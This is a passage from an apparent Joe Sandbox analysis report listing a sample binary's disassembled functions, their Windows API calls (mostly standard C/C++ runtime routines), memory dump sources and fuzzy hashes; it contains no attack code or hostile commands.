                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E8CF10
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00E8CF21
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E8CF32
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E8CF43
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E8CF54
                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E8CF65
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E8CF76
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E8CF87
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E8CF98
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E8CFA9
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E8CFBA
                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00E8CFCB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00E8CFDC
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00E8CFED
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00E8CFFE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00E8D00F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00E8D020
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00E8D031
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00E8D042
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E8D053
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00E8D064
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E8D075
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E8D086
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00E8D097
                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E8D0A8
                                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00E8D0B9
                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E8D0CA
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00E8D0DB
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00E8D0EC
                                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00E8D0FD
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00E8D10E
                                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00E8D11F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00E8D130
                                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00E8D141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                      • API String ID: 667068680-295688737
                                                                                                      • Opcode ID: abe0a0fca2937ff2659bcb90fc0afee082ef08f8008d68d3ca7543cb26e7ef87
                                                                                                      • Instruction ID: 9c9628c23662732de6b09fc167907a429a58418528dfb66c9413053109a6e9a8
                                                                                                      • Opcode Fuzzy Hash: abe0a0fca2937ff2659bcb90fc0afee082ef08f8008d68d3ca7543cb26e7ef87
                                                                                                      • Instruction Fuzzy Hash: 19618C7195A359EFC7006FBAAE4DE673EA8BB0D701304161EB2A5F6170E7F580198F50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                                                                                      • String ID:
                                                                                                      • API String ID: 1186856153-0
                                                                                                      • Opcode ID: cfd7eb4750c443d5765b65ad6a5a08d123359f9a5947bc7468d6e680faeb30f9
                                                                                                      • Instruction ID: dbc31d95b790fd245e84aa93e7efafa24ff76101cb83fa25f7d8d57f698e8939
                                                                                                      • Opcode Fuzzy Hash: cfd7eb4750c443d5765b65ad6a5a08d123359f9a5947bc7468d6e680faeb30f9
                                                                                                      • Instruction Fuzzy Hash: 64C17172900608AFCF15DFA4D996AED7BF4EB08300F14655EF616BB291EB309A85CB50
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00EACD5B
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC0CC
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC0DE
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC0F0
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC102
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC114
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC126
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC138
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC14A
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC15C
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC16E
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC180
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC192
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC1A4
                                                                                                      • _free.LIBCMT ref: 00EACD50
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EACD72
                                                                                                      • _free.LIBCMT ref: 00EACD87
                                                                                                      • _free.LIBCMT ref: 00EACD92
                                                                                                      • _free.LIBCMT ref: 00EACDB4
                                                                                                      • _free.LIBCMT ref: 00EACDC7
                                                                                                      • _free.LIBCMT ref: 00EACDD5
                                                                                                      • _free.LIBCMT ref: 00EACDE0
                                                                                                      • _free.LIBCMT ref: 00EACE18
                                                                                                      • _free.LIBCMT ref: 00EACE1F
                                                                                                      • _free.LIBCMT ref: 00EACE3C
                                                                                                      • _free.LIBCMT ref: 00EACE54
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID: Xb
                                                                                                      • API String ID: 161543041-727557700
                                                                                                      • Opcode ID: 22e645483262ac036dc40031e8f83881c350d4abe7b99722e96a005107f0ce6f
                                                                                                      • Instruction ID: ad91dcc5b52efa528751366b0ed3557ee13f884b19e8b5cfa55319e8cb0fc191
                                                                                                      • Opcode Fuzzy Hash: 22e645483262ac036dc40031e8f83881c350d4abe7b99722e96a005107f0ce6f
                                                                                                      • Instruction Fuzzy Hash: 3D315C71A003049FDF30AA39D945B6A77E9AF8B354F24A429E048FF191DF75BC408754
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: Pb
                                                                                                      • API String ID: 269201875-455994757
                                                                                                      • Opcode ID: ad9722c30d46088f06747a4b511a5f961dd26062fbd565f534c23d7534896e78
                                                                                                      • Instruction ID: 3e14f08d97b24d861e43af19ac7c6b31e4afc7fd4f7b4a67ff82bacb8a65a8b5
                                                                                                      • Opcode Fuzzy Hash: ad9722c30d46088f06747a4b511a5f961dd26062fbd565f534c23d7534896e78
                                                                                                      • Instruction Fuzzy Hash: 32C135B2D40218AFDB20DBA8CD82FEE77F8AB4D754F141165FA04FF282D571A94097A4
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00E9F7C0
                                                                                                      • _free.LIBCMT ref: 00E9F7D6
                                                                                                      • _free.LIBCMT ref: 00E9F7E7
                                                                                                      • _free.LIBCMT ref: 00E9F7F8
                                                                                                      • _free.LIBCMT ref: 00E9F80F
                                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 00E9F857
                                                                                                        • Part of subcall function 00EA90AF: _free.LIBCMT ref: 00EA911A
                                                                                                      • _free.LIBCMT ref: 00E9FA2E
                                                                                                      • _free.LIBCMT ref: 00E9FA41
                                                                                                      • _free.LIBCMT ref: 00E9FA4F
                                                                                                      • _free.LIBCMT ref: 00E9FA5A
                                                                                                      • _free.LIBCMT ref: 00E9FA9C
                                                                                                      • _free.LIBCMT ref: 00E9FAA4
                                                                                                      • _free.LIBCMT ref: 00E9FAAC
                                                                                                      • _free.LIBCMT ref: 00E9FAB4
                                                                                                      • _free.LIBCMT ref: 00E9FAC2
                                                                                                        • Part of subcall function 00EA9261: MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,00ECA8C8,00000000,00000000,3FFFFFFF,?,?,00000004,00000000,00000001,00ECA8C8,0000007F,?,3FFFFFFF), ref: 00EA92A9
                                                                                                        • Part of subcall function 00EA9261: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 00EA931E
                                                                                                        • Part of subcall function 00EA9261: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EA9330
                                                                                                        • Part of subcall function 00EA9261: __freea.LIBCMT ref: 00EA9339
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ByteCharMultiWide$InfoStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 607174680-0
                                                                                                      • Opcode ID: dbe025dbe0297828fcf4424f867b7b5c6a93197cf6b865a673b890690bae5bfd
                                                                                                      • Instruction ID: e5d59807f0eb201110211a5751a3cb7db2e2f2c2074a8c73e5f47a0514aa5148
                                                                                                      • Opcode Fuzzy Hash: dbe025dbe0297828fcf4424f867b7b5c6a93197cf6b865a673b890690bae5bfd
                                                                                                      • Instruction Fuzzy Hash: 4DC18EB1D00209AFDF21DFA5C881BEEBBF5BF49304F145469E459FB282D7B5A8418B60
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B65F
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B681
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B6A1
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4B80A
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B822
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E4B844
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E4B849
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E4B84E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: [8$false$true$}Z
                                                                                                      • API String ID: 3742692055-4066095532
                                                                                                      • Opcode ID: e1a2538f521c745938342841cbafaa5e5ee1accf40a3900c4926b16c9927cfbc
                                                                                                      • Instruction ID: bbf5cba7388f12bc9926e2f8db3bea3166efe5f2b5113193b5c52b709aaf5540
                                                                                                      • Opcode Fuzzy Hash: e1a2538f521c745938342841cbafaa5e5ee1accf40a3900c4926b16c9927cfbc
                                                                                                      • Instruction Fuzzy Hash: 3861AE70A012448FDB24EFA4D945BAEBBF4FF04704F10555EE809BB292EB75EA05CB91
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00EED39C,00000FA0,?,?,00E8D52A), ref: 00E8D558
                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00E8D52A), ref: 00E8D563
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E8D52A), ref: 00E8D574
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E8D586
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E8D594
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E8D52A), ref: 00E8D5B7
                                                                                                      • DeleteCriticalSection.KERNEL32(00EED39C,00000007,?,?,00E8D52A), ref: 00E8D5D3
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00E8D52A), ref: 00E8D5E3
                                                                                                      Strings
                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E8D55E
                                                                                                      • WakeAllConditionVariable, xrefs: 00E8D58C
                                                                                                      • SleepConditionVariableCS, xrefs: 00E8D580
                                                                                                      • kernel32.dll, xrefs: 00E8D56F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                      • API String ID: 2565136772-3242537097
                                                                                                      • Opcode ID: b30c8e14485c7345f1f33961ec185eaf0240430900e9b5b9263e0766c3b19dd4
                                                                                                      • Instruction ID: d262fda7baa0d7d6a6ccef05a00706082d8275e2950c1f3f4361f351d283aeb3
                                                                                                      • Opcode Fuzzy Hash: b30c8e14485c7345f1f33961ec185eaf0240430900e9b5b9263e0766c3b19dd4
                                                                                                      • Instruction Fuzzy Hash: F2018431A4C715EFD7203B7AAD0DF6B3768AB40B58B041115FC1DF6694EBB1C8488B61
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E965E6
                                                                                                      • DName::operator+.LIBCMT ref: 00E9671C
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                      • DName::operator+.LIBCMT ref: 00E966D2
                                                                                                      • DName::operator+.LIBCMT ref: 00E96768
                                                                                                      • DName::operator+.LIBCMT ref: 00E96777
                                                                                                      • DName::operator+.LIBCMT ref: 00E968A4
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E968E4
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E968FC
                                                                                                      • DName::operator+.LIBCMT ref: 00E9690B
                                                                                                      • DName::operator+.LIBCMT ref: 00E96917
                                                                                                        • Part of subcall function 00E97E1C: Replicator::operator[].LIBVCRUNTIME ref: 00E97E59
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1043660730-0
                                                                                                      • Opcode ID: e207235f1d809942bfdefb801da4d89de1a223688163c1b9eb1936757027e1e6
                                                                                                      • Instruction ID: e358f6b8f4b9781515f945c4f9f4a12bf8a2be6a15b97c7ea9d296e4ae2fbad2
                                                                                                      • Opcode Fuzzy Hash: e207235f1d809942bfdefb801da4d89de1a223688163c1b9eb1936757027e1e6
                                                                                                      • Instruction Fuzzy Hash: 79C19FB1904208AFDF24DFA4DD95BEEBBF8AB05304F04545EE14AFB281EB759948CB50
                                                                                                      APIs
                                                                                                      • Replicator::operator[].LIBVCRUNTIME ref: 00E97E59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Replicator::operator[]
                                                                                                      • String ID: -m$@$`F$generic-type-$template-parameter-
                                                                                                      • API String ID: 3676697650-3843975421
                                                                                                      • Opcode ID: 3d19ef85f010587cf9457d7cb221f0026d8ad4fff550c1a79e0a1c975dfd222f
                                                                                                      • Instruction ID: 12a948ed5fd1c8f53c736810b6cf09f241767c81895c2885fab2fd7051aad790
                                                                                                      • Opcode Fuzzy Hash: 3d19ef85f010587cf9457d7cb221f0026d8ad4fff550c1a79e0a1c975dfd222f
                                                                                                      • Instruction Fuzzy Hash: E851A071E082099FDF14DFA5D981BEEBBF8AF08310F14601AE641BB291DB749949CB90
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00EB328D,000000FF), ref: 00E33E4A
                                                                                                      • SetEvent.KERNEL32(?), ref: 00E33E7B
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33E9C
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E33ECB
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33ED7
                                                                                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 00E33EF5
                                                                                                      • QueueUserAPC.KERNEL32(00E33670,00000000,00000000), ref: 00E33F02
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E33F10
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33F23
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33F96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseHandleLeaveWait$EnterEventMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                      • String ID: @a
                                                                                                      • API String ID: 1751207877-1769526761
                                                                                                      • Opcode ID: 513b8c8341a82d08d5a190613827dd9948dc3a2fed093465de8df1aa09f9dd01
                                                                                                      • Instruction ID: cbeef5bd20a921bc1730dff5f43007d3646933d94a9bcaa469bc3f741b7cf2b2
                                                                                                      • Opcode Fuzzy Hash: 513b8c8341a82d08d5a190613827dd9948dc3a2fed093465de8df1aa09f9dd01
                                                                                                      • Instruction Fuzzy Hash: A151AC30A04344DFDB21DF66C848BABBFF0BF05318F04061DE456A76A0D7B5A948CB60
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E97126
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97131
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E9713C
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97224
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97241
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E9725E
                                                                                                      • DName::operator+.LIBCMT ref: 00E97273
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E9728D
                                                                                                      • DName::operator+.LIBCMT ref: 00E97354
                                                                                                        • Part of subcall function 00E933AC: DName::DName.LIBVCRUNTIME ref: 00E933C1
                                                                                                      Strings
